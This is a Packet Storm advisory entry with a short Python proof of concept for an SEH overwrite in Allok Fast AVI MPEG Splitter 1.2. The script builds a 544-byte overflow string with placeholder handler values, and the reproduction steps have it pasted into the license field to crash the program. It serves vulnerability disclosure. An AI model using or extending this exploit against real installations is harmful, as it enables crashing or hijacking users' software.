Allok Fast AVI MPEG Splitter 1.2 SEH Overwrite

2018-08-01T00:00:00
ID PACKETSTORM:148770
Type packetstorm
Reporter Shubham Singh
Modified 2018-08-01T00:00:00

Description

                                        
                                            `#!/usr/bin/env python  
  
# Exploit Title : Allok Fast AVI MPEG Splitter 1.2 SEH Overwrite POC   
# Vulnerability Type: SEH Overwrite POC  
# Discovery by : Shubham Singh  
# Known As : Spirited Wolf [Twitter: @Pwsecspirit]  
# Email : spiritedwolf@protonmail.com  
# Youtube Channel : www.youtube.com/c/Pentestingwithspirit   
# Discovey Date : 01/08/2018  
# Software Link : http://www.alloksoft.com/fast_splitter.htm   
# Tested Version : 1.2  
# Tested on OS : Windows XP Service Pack 3 x86  
# Steps to Reproduce:   
# Run the python exploit.py , Open "exploit.txt" and copy content.  
# Open Fast AVI MPEG Splitter , A registration prompt will appear.  
# In the License field paste the content of "exploit.txt".  
# Press "OK" and B00m Crashed.  
#SEH chain of main thread, item 0  
# Address=00129B78  
# SE handler=43434343  
#SEH chain of main thread, item 1  
# Address=42424242  
# SE handler=*** CORRUPT ENTRY ***  
  
buffer = "\x41" * 544  
nseh = "\x42\x42\x42\x42"  
seh= "\x43\x43\x43\x43"   
  
exploit = buffer + nseh + seh   
f = open ("exploit.txt", "w")  
f.write(exploit)  
f.close()  
  
`